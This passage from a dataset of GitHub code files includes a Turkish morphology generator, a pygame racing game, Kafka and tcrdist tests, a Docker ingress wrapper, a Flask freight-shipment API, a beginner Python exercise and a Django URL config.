pywrapfst\n\n_Analysis = analysis_pb2.Analysis\n_Ig = analysis_pb2.InflectionalGroup\n_SymbolTable = pywrapfst.SymbolTable\n\n_SYMBOLS_REGEX = re.compile(\n # First inflectional group.\n r\"\\(.+?\\[[A-Z\\.,:\\(\\)\\'\\-\\\"`\\$]+?\\]|\"\n # Inflectional group boundaries.\n r\"\\)?\\(\\[[A-Z]+?\\]|\"\n # Derivational morphemes.\n r\"-(?:[^\\W\\d_]|')+?\\[[A-z]+?=[A-z]+?\\]|\"\n # Inflectional morphemes and features.\n r\"\\+(?:[^\\W\\d_]|['\\.])*?\\[[A-z]+?=[A-z0-9]+?\\]|\"\n # Proper noun analysis.\n r\"\\)\\+\\[Proper=(?:True|False)\\]|\"\n # Numbers.\n r\"\\d+(?:\\[[A-Z]+?\\])?|\"\n # Parenthesis or decimal point separators.\n r\"[\\(\\.,]\")\n\n\ndef _lower(string: str) -> str:\n \"\"\"Properly lowercase transforms Turkish string (\"İ\" -> \"i\", \"I\" -> \"ı\").\"\"\"\n return string.replace(\"İ\", \"i\").replace(\"I\", \"ı\").lower()\n\n\ndef _add_proper(analysis: _Analysis) -> None:\n \"\"\"Adds the proper feature to the last inflectional group if it is missing.\"\"\"\n last_ig = analysis.ig[-1]\n\n if last_ig.HasField(\"proper\"):\n return analysis\n\n with_proper = _Analysis()\n with_proper.CopyFrom(analysis)\n with_proper.ig[-1].proper = last_ig.pos == \"NNP\"\n return with_proper\n\n\ndef _symbol_indices(analysis: _Analysis,\n symbol_table: _SymbolTable) -> Generator[int, None, None]:\n \"\"\"Generates the label indices for the symbols that construct the analysis.\"\"\"\n human_readable = pretty_print.analysis(analysis)\n symbols = _SYMBOLS_REGEX.findall(human_readable)\n yield from map(symbol_table.find, symbols)\n\n\ndef surface_form(analysis: _Analysis) -> str:\n \"\"\"Generates surface form for the given morphological analysis.\n\n This function assumes that input analysis protobuf is structurally\n well-formed, meaning that they should be first validated with\n //turkish_morphology:validate.py.\n\n Args:\n analysis: morphological analysis of a Turkish word from which surface form\n will be generated.\n\n Returns:\n Surface form of the Turkish word whose morphological analysis is the\n given morphological analysis. Returns an empty string if a surface form\n cannot be generated from the given morphological analysis.\n \"\"\"\n symbol_table = fst.ANALYZER.input_symbols()\n symbol_indices = _symbol_indices(_add_proper(analysis), symbol_table)\n input_ = fst.compile(symbol_indices, symbol_table)\n output = fst.compose(fst.ANALYZER, input_)\n\n if output.start() == -1: # has no path to the accept state.\n return \"\"\n\n surface_forms = fst.extract_parses(output, output.start(), \"ilabel\")\n surface_forms = list(set(map(_lower, surface_forms)))\n return surface_forms[0]\n","repo_name":"google-research/turkish-morphology","sub_path":"turkish_morphology/generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":2772,"program_lang":"python","lang":"en","doc_type":"code","stars":157,"dataset":"github-code","pt":"72"} +{"seq_id":"16378115416","text":"import pygame\nimport time \nimport random\nimport sys\npygame.init()\n\n#colors\ngray = (64, 62, 57)\nwhite = (255,255,255)\nblack = (0,0,0)\nred = (200,0,0)\nblue = (0,0,200)\ngreen = (0,200,0)\nbright_red = (255,0,0)\nbright_green = (0,255,0)\nbright_blue = (0,0,255)\n\nwindow_width = 800\nwindow_height = 600\ncar_width = 56\npause = False\n\n\n#display\ngd = pygame.display.set_mode((window_width,window_height))\npygame.display.set_caption(\"CAR-RACE\")\ncarimg = pygame.image.load('c3.png')\nclock = pygame.time.Clock()\nbgimg = pygame.image.load('bg.png')\nintro_bg = pygame.image.load('b-1.jpg')\ninstrct_bg = pygame.image.load('b-2.jpg')\npause_bg = pygame.image.load('b-3.jpg')\nwstrip = pygame.image.load('white.png')\ny1 = pygame.image.load('y1.png')\nyy2 = pygame.image.load('y-2.png')\ny3 = pygame.image.load('y-3.png')\nllane = pygame.image.load('lane.png')\nrlane = pygame.image.load('rlane.png')\nbgd = pygame.image.load('bg-4.png')\n\ncrash_sound = pygame.mixer.Sound(\"pexp.wav\")\ncar_sound = pygame.mixer.Sound(\"car.wav\")\nhorn_sound = pygame.mixer.Sound(\"horn.wav\")\n\n\ndef intro_loop():\n intro =True\n while intro:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n quit()\n sys.exit()\n gd.blit(intro_bg,(0,0))\n largetext = pygame.font.Font('freesansbold.ttf',115)\n TextSurf,TextRect = text_objects(\"CITY RACE\",largetext)\n TextRect.center = (400,100)\n gd.blit(TextSurf,TextRect)\n button(\"START\",150,520,100,50,green,bright_green,\"play\")\n button(\"QUIT\",550,520,100,50,red,bright_red,\"quit\")\n button(\"INSTRUCTIONS\",300,520,200,50,blue,bright_blue,\"instrct\")\n pygame.display.update()\n clock.tick(50)\n\ndef countdown_bg():\n font = pygame.font.SysFont(None,25)\n x = (window_width*0.45)\n y = (window_height*0.8)\n gd.blit(bgimg,(0,0))\n text = font.render(\"Car Passed : 0\",True,black)\n score = font.render(\"SCORE : 0\",True,bright_red)\n gd.blit(text,(0,50))\n gd.blit(score,(0,30))\n button(\"Pause\",675,0,100,50,green,bright_green,\"pause\")\n\ndef countdown():\n cntdwn = True\n while cntdwn:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n quit()\n sys.exit()\n countdown_bg()\n largetext = pygame.font.Font('freesansbold.ttf',90)\n ts,tr = text_objects(\"3\",largetext)\n tr.center = ((window_width/2),(window_height/2))\n gd.blit(ts,tr)\n pygame.display.update()\n clock.tick(1)\n\n countdown_bg()\n largetext = pygame.font.Font('freesansbold.ttf',90)\n ts,tr = text_objects(\"2\",largetext)\n tr.center = ((window_width/2),(window_height/2))\n gd.blit(ts,tr)\n pygame.display.update()\n clock.tick(1)\n \n countdown_bg()\n largetext = pygame.font.Font('freesansbold.ttf',90)\n ts,tr = text_objects(\"1\",largetext)\n tr.center = ((window_width/2),(window_height/2))\n gd.blit(ts,tr)\n pygame.display.update()\n clock.tick(1)\n \n countdown_bg()\n largetext = pygame.font.Font('freesansbold.ttf',90)\n ts,tr = text_objects(\"GO\",largetext)\n tr.center = ((window_width/2),(window_height/2))\n gd.blit(ts,tr)\n pygame.display.update()\n clock.tick(1)\n gameLoop()\n\ndef paused():\n global pause\n pygame.mixer.music.pause()\n pause = True\n while pause:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n quit()\n sys.exit()\n gd.blit(pause_bg,(0,0))\n largetext = pygame.font.Font('freesansbold.ttf',80)\n ts,tr = text_objects(\"PAUSED\",largetext)\n tr.center = ((window_width/2),(window_height/2))\n gd.blit(ts,tr)\n button(\"CONTINUE\",125,450,150,50,green,bright_green,\"unpause\")\n button(\"RESTART\",325,450,150,50,blue,bright_blue,\"play\")\n button(\"MAIN MENU\",525,450,200,50,red,bright_red,\"home\")\n pygame.display.update()\n clock.tick(30)\n\ndef unpaused():\n global pause\n pygame.mixer.music.unpause()\n pause = False\n\n\ndef button(msg,x,y,w,h,ic,ac,action = None):\n mouse = pygame.mouse.get_pos()\n click = pygame.mouse.get_pressed()\n if x+w > mouse[0] >x and y+h >mouse[1] > y:\n pygame.draw.rect(gd,ac,(x,y,w,h))\n if click[0] == 1 and action != None:\n if action == \"play\":\n countdown()\n elif action == \"quit\":\n pygame.quit()\n quit()\n sys.exit()\n elif action == \"instrct\":\n instruction()\n elif action == \"home\":\n intro_loop()\n elif action == \"pause\":\n paused()\n elif action == \"unpause\":\n unpaused()\n\n \n else:\n pygame.draw.rect(gd,ic,(x,y,w,h))\n smalltext = pygame.font.Font(\"freesansbold.ttf\",20)\n textsurf,textrect = text_objects(msg,smalltext)\n textrect.center = ((x+(w/2)),(y+(h/2)))\n gd.blit(textsurf,textrect)\n\n\n\n\n\ndef instruction():\n instruction = True\n while instruction:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n quit()\n sys.exit()\n gd.blit(instrct_bg,(0,0))\n largetext = pygame.font.Font('freesansbold.ttf',80)\n mediumtext = pygame.font.Font('freesansbold.ttf',60)\n smalltext = pygame.font.Font('freesansbold.ttf',20)\n textSurf,textRect = text_objects(\"City Racing is a 2d racing game made for entertainment.\",smalltext)\n textRect.center = (400,180)\n ts,tr = text_objects(\"The game is consist of many levels with increasing speed.\",smalltext)\n tr.center = (400,210)\n TextSurf,TextRect = text_objects(\"INSTRUCTIONS\",largetext)\n TextRect.center = (400,100)\n gd.blit(ts,tr)\n gd.blit(TextSurf,TextRect)\n gd.blit(textSurf,textRect)\n stextSurf,stextRect = text_objects(\"Left Arrow : TURN LEFT\",smalltext)\n stextRect = (15,350)\n htextSurf,htextRect = text_objects(\"Right Arrow : TURN RIGHT\",smalltext)\n htextRect = (15,400)\n atextSurf,atextRect = text_objects(\"Press A : ACCELERATION\",smalltext)\n atextRect = (520,350)\n btextSurf,btextRect = text_objects(\"Press B : BRAKE\",smalltext)\n btextRect = (520,400)\n ptextSurf,ptextRect = text_objects(\"Press P : PAUSE\",smalltext)\n ptextRect = (15,450)\n ctextSurf,ctextRect = text_objects(\"CONTROLS\",mediumtext)\n ctextRect.center = (400,275)\n gd.blit(stextSurf,stextRect)\n gd.blit(htextSurf,htextRect)\n gd.blit(atextSurf,atextRect)\n gd.blit(btextSurf,btextRect)\n gd.blit(ptextSurf,ptextRect)\n gd.blit(ctextSurf,ctextRect)\n button(\"Back\",350,500,100,50,blue,bright_blue,\"home\")\n pygame.display.update()\n clock.tick(30)\n\n\n\n\n\ndef obstacle(obs_startx,obs_starty,obs):\n if obs == 0:\n obs_pic = pygame.image.load(\"c1.png\")\n elif obs == 1:\n obs_pic = pygame.image.load(\"c2.png\")\n elif obs == 2:\n obs_pic = pygame.image.load(\"c4.png\")\n elif obs == 3:\n obs_pic = pygame.image.load(\"c-6.png\")\n elif obs == 4:\n obs_pic = pygame.image.load(\"c-7.png\")\n gd.blit(obs_pic,(obs_startx,obs_starty)) \n\ndef score_system(passed,score):\n font = pygame.font.Font(\"freesansbold.ttf\",20)\n text = font.render(\"CAR PASSED :\"+str(passed),True,black)\n score = font.render(\"SCORE :\"+str(score),True,red)\n gd.blit(text,(0,60))\n gd.blit(score,(0,30))\n\ndef car(x,y):\n gd.blit(carimg,(x,y))\n\ndef bg():\n gd.blit(llane,(0,0))\n gd.blit(llane,(0,200))\n gd.blit(llane,(0,400))\n gd.blit(rlane,(700,0))\n gd.blit(rlane,(700,200))\n gd.blit(rlane,(700,400))\n \n # gd.blit(bgimg,(0,0))\n\ndef text_objects(text,font):\n textsurface = font.render(text,True,black)\n return textsurface,textsurface.get_rect()\n\ndef msg_display(text):\n lt = pygame.font.Font(\"freesansbold.ttf\",50)\n textsurf,textrect = text_objects(text,lt)\n textrect.center = ((window_width/2),(window_height/2))\n gd.blit(textsurf,textrect)\n pygame.display.update()\n time.sleep(3)\n gameLoop()\n\ndef crash():\n pygame.mixer.Sound.play(crash_sound)\n pygame.mixer.music.stop()\n msg_display(\"CAR CRASHED\") \n\ndef horn():\n # pygame.mixer.Sound.stop(car_sound)\n pygame.mixer.Sound.play(horn_sound)\n pygame.mixer.Sound.stop(horn_sound)\n # pygame.mixer.Sound.play(car_sound)\n\ndef gameLoop():\n global pause\n x = (window_width*0.45)\n y = (window_height*0.8)\n x_change = 0\n obs_speed = 9\n obs = 0\n y_change = 0\n obs_startx = random.randrange(200,(window_width-200))\n obs_starty = -750\n obs_width = 56\n obs_height = 125\n passed = 0\n level = 1\n score = 0\n y2 = 900\n \n bumped = False\n while not bumped:\n \n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n quit()\n\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_LEFT:\n x_change = -5\n if event.key == pygame.K_RIGHT:\n x_change = 5\n if event.key == pygame.K_a:\n obs_speed += 2\n if event.key == pygame.K_b:\n obs_speed -= 2\n if event.key == pygame.K_h:\n horn()\n \n\n\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT:\n x_change = 0\n\n x += x_change\n gd.fill(gray)\n \n rel_y = y2 % bgimg.get_rect().width\n gd.blit(bgimg,(0,rel_y-bgimg.get_rect().width))\n if rel_y < 600:\n gd.blit(bgimg,(0,rel_y))\n gd.blit(bgimg,(0,rel_y+800))\n gd.blit(bgd,(0,y+600))\n gd.blit(wstrip,(240,rel_y-190))\n gd.blit(wstrip,(500,rel_y-190))\n gd.blit(y1,(335,rel_y-190))\n gd.blit(yy2,(135,rel_y-190))\n gd.blit(y3,(600,rel_y-190))\n # gd.blit(bgimg,(0,rel_y-600))\n # gd.blit(bgimg,(0,rel_y-500))\n # gd.blit(bgimg,(0,rel_y-400))\n # gd.blit(bgimg,(0,rel_y-300))\n # gd.blit(bgimg,(0,rel_y-200))\n # gd.blit(bgimg,(0,rel_y-100))\n # gd.blit(bgimg,(0,rel_y-50))\n # gd.blit(bgimg,(0,rel_y-25))\n # gd.blit(bgimg,(0,rel_y-12))\n # gd.blit(bgd,(140,rel_y))\n # gd.blit(bgd,(140,rel_y+100))\n # gd.blit(bgd,(140,rel_y+200))\n # gd.blit(bgd,(140,rel_y+300))\n # gd.blit(bgd,(140,rel_y+400))\n \n y2 += obs_speed\n\n bg()\n obs_starty -=(obs_speed/4)\n obstacle(obs_startx,obs_starty,obs)\n obs_starty += obs_speed\n car(x,y)\n score_system(passed,score)\n font = pygame.font.Font(\"freesansbold.ttf\",20)\n l = font.render(\"LEVEL :\"+str(level),True,red)\n gd.blit(l,(0,90))\n button(\"Back\",30,500,100,50,blue,bright_blue,\"home\")\n pygame.mixer.Sound.play(car_sound)\n \n if x > 680-car_width or x < 140:\n pygame.mixer.Sound.stop(car_sound)\n crash()\n if x > window_width-(car_width+110) or x < 110:\n pygame.mixer.Sound.stop(car_sound)\n crash()\n if obs_starty > window_height:\n obs_starty = 0 - obs_height\n obs_startx = random.randrange(170,(window_width-170))\n obs = random.randrange(0,5)\n passed += 1\n score = passed*10\n if passed%10 == 0:\n level += 1\n obs_speed += 2\n lt = pygame.font.Font(\"freesansbold.ttf\",50)\n textsurf,textrect = text_objects(\"LEVEL \"+str(level),lt)\n textrect.center = ((window_width/2),(window_height/2))\n gd.blit(textsurf,textrect)\n pygame.display.update()\n time.sleep(3)\n \n if y < obs_starty + obs_height:\n if x > obs_startx and x < obs_startx + obs_width or x+car_width > obs_startx and x+car_width < obs_startx+obs_width:\n pygame.mixer.Sound.stop(car_sound)\n crash()\n \n button(\"Pause\",675,0,100,50,green,bright_green,\"pause\")\n pygame.display.update()\n clock.tick(60)\n\nintro_loop()\ngameLoop()\npygame.quit()\nquit()","repo_name":"ram-birla/car-race","sub_path":"race.py","file_name":"race.py","file_ext":"py","file_size_in_byte":12640,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"71433147113","text":"\n\n\n\ndef test_example_tree():\n \"\"\"\n An example showing how to create an interactive\n tree from a sample of mouse TCRs \n \"\"\"\n import os\n import pandas as pd\n from tcrdist.repertoire import TCRrep\n from tcrdist.tree import TCRtree\n\n df = pd.read_csv(\"dash.csv\").sample(100, random_state=1).reset_index(drop = True)\n\n tr = TCRrep(cell_df = df, \n organism = 'mouse', \n chains = ['beta'], \n db_file = 'alphabeta_gammadelta_db.tsv')\n\n tcrtree = TCRtree(tcrrep = tr, \n html_name = 'dash.mouse.b.tree.html')\n\n tcrtree.build_tree()\n\n assert os.path.isfile('dash.mouse.b.tree.html')","repo_name":"kmayerb/tcrdist3","sub_path":"tcrdist/tests/test_example_13.py","file_name":"test_example_13.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"72"} +{"seq_id":"32012704765","text":"\nimport unittest\nfrom app import parse_cli_args\nfrom unittest.mock import Mock, patch\nimport app\n\nclass TestKafka(unittest.TestCase):\n\n def setup_ArgumentParser(self):\n print(\"testing parse_args_with_arguments: {'channel':'test-channel','server':'test-server'}\")\n response_args = Mock()\n response_args.parse_args.return_value = {'channel':'test-channel','server':'test-server'}\n return response_args\n\n def log_add_argument(self): \n response = Mock() \n response.add_argument.return_value = print(\"add_argument_called\") \n return response \n\n def setup_producer_object(self,server):\n prodObject = Mock()\n prodObject.produce.return_value = print(\"produced encoded message to test-topic \")\n prodObject.flush.return_value = \"flushed topic\"\n return prodObject\n\n def setup_poll(self,value):\n pollObj = Mock()\n pollObj.error.return_value = False\n pollObj.value.side_effect = KeyboardInterrupt\n return pollObj\n\n def setup_consumer_object(self,server):\n consumeObject = Mock()\n consumeObject.subscribe.return_value = print(\"produced encoded message to test-topic \")\n consumeObject.poll.side_effect = self.setup_poll\n consumeObject.close.return_value = \"closed consumer\"\n return consumeObject\n\n def mock_inpt(self,text,count):\n mock_input = Mock()\n mock_input.return_value = \"q\" if count > 0 else \"er\"\n return mock_input.return_value \n\n def test_read_args_with_no_arguments(self):\n with self.assertRaises(SystemExit):\n parse_cli_args()\n\n @patch('builtins.print') #test a print\n @patch('app.argparse') \n def test_add_argument(self,mock_argparse,mock_print): \n mock_argparse.ArgumentParser.side_effect = self.log_add_argument\n parse_cli_args() \n mock_print.assert_called_with('add_argument_called')\n \n\n @patch('app.argparse') \n def test_parse_args_with_arguments(self,mock_argparse): \n mock_argparse.ArgumentParser.side_effect = self.setup_ArgumentParser\n assert parse_cli_args()['channel'] == 'test-channel'\n\n @patch('builtins.print') \n @patch('app.ck')\n @patch('app.get_input') \n def test_Producer(self,mock_input,mock_producer,mock_produce):\n mock_producer.Producer.side_effect = self.setup_producer_object \n mock_input.side_effect = self.mock_inpt\n app.produce_message('test-topic','test-server') \n mock_produce.assert_called_with('Chat CLI')\n mock_produce.assert_called() \n\n @patch('builtins.print') \n @patch('app.ck') \n def test_consumer(self,mock_consumer,mock_consume):\n mock_consumer.Consumer.side_effect = self.setup_consumer_object \n app.consume_message('latest','test-server','test-topic') \n mock_consume.assert_called()\n\n @patch('builtins.print')\n @patch('app.ck') \n def test_msg_error_when_None(self,mock_consumer,mock_print): \n pass\n\n def test_consumer_close(self):\n pass\n# @patch('app.Producer') \n# @patch('app.produce_message')\n# def test_produce_message(self,mock_producer,mockProducer): \n# mockProducer.return_value = 2 \n# app.produce_message('test-event','localhost:9092')\n# mock_producer.assert_called_once() \n# mock_producer.assert_called_with('test-event','localhost:9092') \n# self.assertTrue(2, mockProducer)\n\n# @patch('app.Producer.produce') \n# @patch('app.Producer') \n# @patch('app.produce_actions')\n# def test_produce_actions(self,mock_produce,mockProducer,pp): \n# app.produce_actions(mockProducer,'test-event','hey')\n# mock_produce.assert_called_once() \n# print(pp) \n\n\n# testproduce = mockProducer.produce('test-event','hey')\n# #testproduce.assert_called_once() \n \n# @patch('app.consume_message')\n# def test_consume_message(self,mock_consumer):\n# app.consume_message('start','test-event','localhost:9092')\n# mock_consumer.assert_called_once() \n# mock_consumer.assert_called_once_with('start','test-event','localhost:9092')\n \n\n# #set .side_effect to a function that Mock will invoke when you call your mocked method.\n# def logger(self, err, msg):\n# if err is not None:\n# print('Message delivery error: {}'.format(err))\n# return 'error logged'\n# else:\n# print('Message {} delivered to topic'.format(msg))\n\n# return 'message logged'\n\n# @patch('app.delivery_report') \n# def test_delivery_report_logging(self,mock_delivery):\n# # Test a successful, logged request\n# mock_delivery.side_effect = self.logger('error','hey')\n# assert app.delivery_report() != 'error logged'\n# mock_delivery.side_effect = self.logger(None,'hey')\n# assert app.delivery_report() != 'message logged' \n\nif __name__=='__main__': \n unittest.main()\n \n ","repo_name":"MarkTLite/chat-cli-kafka","sub_path":"test_app.py","file_name":"test_app.py","file_ext":"py","file_size_in_byte":5203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41456514579","text":"#\n# @lc app=leetcode id=172 lang=python3\n#\n# [172] Factorial Trailing Zeroes\n#\n\n\nclass Solution:\n def trailingZeroes(self, n: int) -> int:\n\n count = 0\n\n for i in range(1, 17):\n\n count += n//(5**i)\n\n return count\n","repo_name":"HOZH/leetCode","sub_path":"leetCodePython/172.factorial-trailing-zeroes.py","file_name":"172.factorial-trailing-zeroes.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"70494188392","text":"#!/usr/bin/env python3\n\nimport argparse\nimport subprocess\nfrom os.path import isfile\nimport os\nimport sys\nimport time\nimport signal\nfrom datetime import datetime\n\nstopping=False\ndef stop_handler(signum, frame):\n global stopping\n print(f'{datetime.now()}: stopping mnat-ingress wrapper ({os.getpid()})')\n stopping = True\n\ndef main(args_in):\n global stopping\n parser = argparse.ArgumentParser(\n description='''\nThis runs mnat-ingress.py in the expected docker container layout.\n\nmnat-ingress monitors the mnat server for active mappings (which should\ncome from joins reported by egresses). This launches:\n - mnat-translate to translate from the upstream global to the downstream\n local addresses.\n - this launches smcroutectl to join the global (S,G) on the upstream\n interface.\n\nIn addition to launching the join upstream, mnat-ingress exports the\nactive joins in the control file. ingress-start specifies the control\nfile within the docker container as /var/run/mnat/ingress-joined.sgs,\nso that's the file that should be monitored for changes.\n\nSince this is designed as the docker entry point, it will use docker-\nspecific paths by default if they are present. This happens with:\n - /etc/mnat/ca.pem (containing a public root cert to validate the server)\n - /etc/mnat/client.pem (containing a private cert to prove identity of this client)\n - /var/run/mnat/ingress-joined.sgs (containing the upstream joined (S,G)s, which can be useful to export to ingest-mgr or cbacc-mgr)\n''')\n\n parser.add_argument('-v', '--verbose', action='count', default=0)\n parser.add_argument('-s', '--server', required=True, help='hostname of server')\n parser.add_argument('-p', '--port', help='port for h2 on server', default=443, type=int)\n parser.add_argument('-u', '--upstream-interface', help='receive interface for local network NATted traffic', required=True)\n parser.add_argument('-d', '--downstream-interface', help='transmit interface for de-NATted global traffic', required=True)\n\n args = parser.parse_args(args_in[1:])\n verbosity = None\n if args.verbose:\n verbosity = '-'+'v'*args.verbose\n\n control='/var/run/mnat/ingress-joined.sgs'\n cacert ='/etc/mnat/ca.pem'\n clientcert ='/etc/mnat/client.pem'\n\n ingress_cmd = [\n '/usr/bin/stdbuf', '-oL', '-eL', \n sys.executable, '/bin/mnat-ingress.py',\n '-i', args.upstream_interface,\n '-o', args.downstream_interface,\n '-s', args.server,\n '-p', str(args.port),\n '-f', control,\n ]\n\n if verbosity:\n ingress_cmd.append(verbosity)\n\n if isfile(cacert):\n ingress_cmd.extend([\n '--cacert', cacert,\n ])\n\n if isfile(clientcert):\n ingress_cmd.extend([\n '--cert', clientcert,\n ])\n\n os.environ[\"PYTHONUNBUFFERED\"] = \"1\"\n signal.signal(signal.SIGTERM, stop_handler)\n signal.signal(signal.SIGINT, stop_handler)\n signal.signal(signal.SIGHUP, stop_handler)\n\n ingress_p = subprocess.Popen(ingress_cmd)\n\n ingress_ret = None\n while ingress_ret is None and not stopping:\n ingress_ret = ingress_p.poll()\n time.sleep(1)\n\n if ingress_ret is None:\n ingress_p.send_signal(signal.SIGTERM)\n ingress_p.wait(1)\n\n return ingress_ret\n\nif __name__==\"__main__\":\n ret = main(sys.argv)\n sys.exit(ret)\n\n","repo_name":"GrumpyOldTroll/mnat","sub_path":"ingress/docker/ingress-start.py","file_name":"ingress-start.py","file_ext":"py","file_size_in_byte":3396,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"19819940831","text":"#!/usr/bin/env python\n\nfrom flask import Flask, jsonify, make_response, request\nfrom flask_restful import Resource, Api, abort\nfrom flask_sqlalchemy import SQLAlchemy\nimport json\nfrom os import getenv\nfrom dotenv import load_dotenv\nload_dotenv()\n\napp = Flask(__name__)\napi = Api(app)\n\n## database config\nconnection = f\"mysql+pymysql://{getenv('MYSQL_ROOT_USER')}:{getenv('MYSQL_ROOT_PASSWORD')}@{getenv('MYSQL_HOST')}/freight\"\napp.config['SQLALCHEMY_DATABASE_URI'] = connection\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\ndb = SQLAlchemy(app)\n\n## models\nclass Orgs(db.Model):\n __tablename__ = 'organizations'\n id = db.Column(db.String(64), primary_key=True)\n code = db.Column(db.String(32), default=None, nullable=False)\n\n def __repr__(self):\n return f\"{self.id}\"\n\n\nclass Shipments(db.Model):\n __tablename__ = 'shipments'\n id = db.Column(db.String(64), primary_key=True)\n eta = db.Column(db.String(64), nullable=True, default=None)\n org_id = db.Column(db.Text, nullable=True, default=None)\n weight = db.Column(db.Integer, nullable=True, default=None)\n unit = db.Column(db.String(32), nullable=True, default=None)\n\n def __repr__(self):\n return f\"{self.id}\"\n\n\n## routes\nclass Grossweight(Resource):\n oz_per_lb = 16\n oz_per_kg = 35.2739\n\n lb_per_oz = 0.0625\n lb_per_kg = 2.2046\n\n kg_per_lb = 0.4536\n kg_per_oz = 0.0284\n\n def get(self, unit):\n if not unit in ('pounds', 'ounces', 'kilograms'):\n abort(400, message=f\"{unit} not supported.\")\n\n shipments = Shipments.query.all()\n kgs = sum([i.weight for i in shipments if i.unit == 'KILOGRAMS'])\n lbs = sum([i.weight for i in shipments if i.unit == 'POUNDS'])\n ozs = sum([i.weight for i in shipments if i.unit == 'OUNCES'])\n\n if unit == 'pounds':\n total = round((kgs * self.lb_per_kg) + (ozs * self.lb_per_oz) + lbs, 3)\n if unit == 'kilograms':\n total = round((lbs * self.kg_per_lb) + (ozs * self.kg_per_oz) + kgs, 3)\n if unit == 'ounces':\n total = round((kgs * self.oz_per_kg) + (lbs * self.oz_per_lb) + ozs, 3)\n\n return make_response(jsonify(weight=total, unit=unit), 200)\n\n\nclass Organization(Resource):\n def get(self, id):\n org = Orgs.query.get(id)\n return jsonify(id=org.id, code=org.code) if org else abort(404, message=f\"{id} not found.\")\n\n\n def post(self):\n data = json.loads(request.get_json())\n id, code = data['id'], data['code']\n\n ## debugging\n app.logger.debug(f\"{data} {type(data)} --> post payload\")\n\n ## insert if org exists, else update\n org = Orgs.query.get(id)\n if org is None:\n app.logger.info(f\"org {id} does not exist\")\n new_org = Orgs(id=id, code=code)\n db.session.add(new_org)\n else:\n app.logger.info(f\"org {id} exists\")\n org.id = id\n org.code = code\n db.session.add(org)\n\n db.session.commit()\n return make_response(jsonify(data), 201)\n\n\nclass Shipment(Resource):\n def get(self, id):\n ship = Shipments.query.get(id)\n return jsonify(id=ship.id, eta=ship.eta, org_id=eval(ship.org_id), weight=ship.weight, unit=ship.unit) if ship else abort(404, message=f\"{id} not found.\")\n\n\n def post(self):\n data = json.loads(request.get_json())\n id = data['referenceId']\n\n ## debugging\n app.logger.debug(f\"{data} {type(data)} --> post payload\")\n\n ## substitute list of org codes with list of org ids\n org_id = repr([str(Orgs.query.filter_by(code=org).first()) for org in data['organizations']])\n\n ## some shipments will not have an eta\n eta = data.get('estimatedTimeArrival', None)\n\n ## some shipments will have no transport packs\n weight, unit = None, None\n if data['transportPacks']['nodes']:\n weight = int(data['transportPacks']['nodes'][0]['totalWeight']['weight'])\n unit = data['transportPacks']['nodes'][0]['totalWeight']['unit']\n\n ## check for existing shipment\n shipment = Shipments.query.get(id)\n if shipment is None:\n new_shipment = Shipments(id=id, eta=eta, org_id=org_id, weight=weight, unit=unit)\n db.session.add(new_shipment)\n else:\n shipment.id = id\n shipment.eta = eta\n shipment.org_id = org_id\n shipment.weight = weight\n shipment.unit = unit\n db.session.add(shipment)\n\n db.session.commit()\n return make_response(jsonify(data), 201)\n\n\napi.add_resource(Organization, '/organization', '/organization/')\napi.add_resource(Shipment, '/shipment/', '/shipment')\napi.add_resource(Grossweight, '/grossweight/', '/grossweight')\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"brukshut/freight","sub_path":"freight.py","file_name":"freight.py","file_ext":"py","file_size_in_byte":4873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27724048528","text":"# Learning about if\n# Place your name here\n\n# Get a string from the user\nuser_input = input(\"Please enter an integer: \")\nif not user_input.isnumeric():\n print(\"that wasn't an integer you know...\")\nelse:\n print(\"thanks\")\n # Ok, let's put this into a float variable\n number1 = int(user_input)\n \n# Get a string from the user\nuser_input = input(\"Please enter another integer: \")\nif not user_input.isnumeric():\n print(\"that wasn't an integer you know...\")\nelse:\n print(\"thanks\")\n # Ok, let's put this into a float variable\n number2 = int(user_input)\n\n# Let's compare these\nif number1 > number2:\n print(\"Hmm. the first number was bigger\")\nelif number2 > number1:\n print(\"the second number was bigger\")\nelse:\n print(\"ah, nice try, they were the same\")\n\n\n \n\n","repo_name":"profcturner/introductory-python","sub_path":"python/lab2/lab2_1.py","file_name":"lab2_1.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13890093889","text":"from django.urls import path\n\nfrom .views import (\n WordList,\n WordAllList,\n WordDetail,\n WordDeckList,\n WordCreate,\n WordUpdateExercise,\n WordUpdateCorrectAnswer,\n WordUpdateWrongAnswer,\n WordDraw,\n WordDelete,\n WordUpdate,\n)\n\nurlpatterns = [\n path(\"\", WordList.as_view(), name=\"words\"),\n path(\"deck//\", WordDeckList.as_view(), name=\"words_deck\"),\n path(\"admin/\", WordAllList.as_view(), name=\"all_words\"),\n path(\"practice//\", WordDraw.as_view(), name=\"draw_word\"),\n path(\"/add-exercise/\", WordUpdateExercise.as_view(), name=\"add_exercise\"),\n path(\n \"/correct-answer/\",\n WordUpdateCorrectAnswer.as_view(),\n name=\"add_correct_answer\",\n ),\n path(\n \"/wrong-answer/\",\n WordUpdateWrongAnswer.as_view(),\n name=\"add_wrong_answer\",\n ),\n path(\"/\", WordDetail.as_view(), name=\"word\"),\n path(\"/update/\", WordUpdate.as_view(), 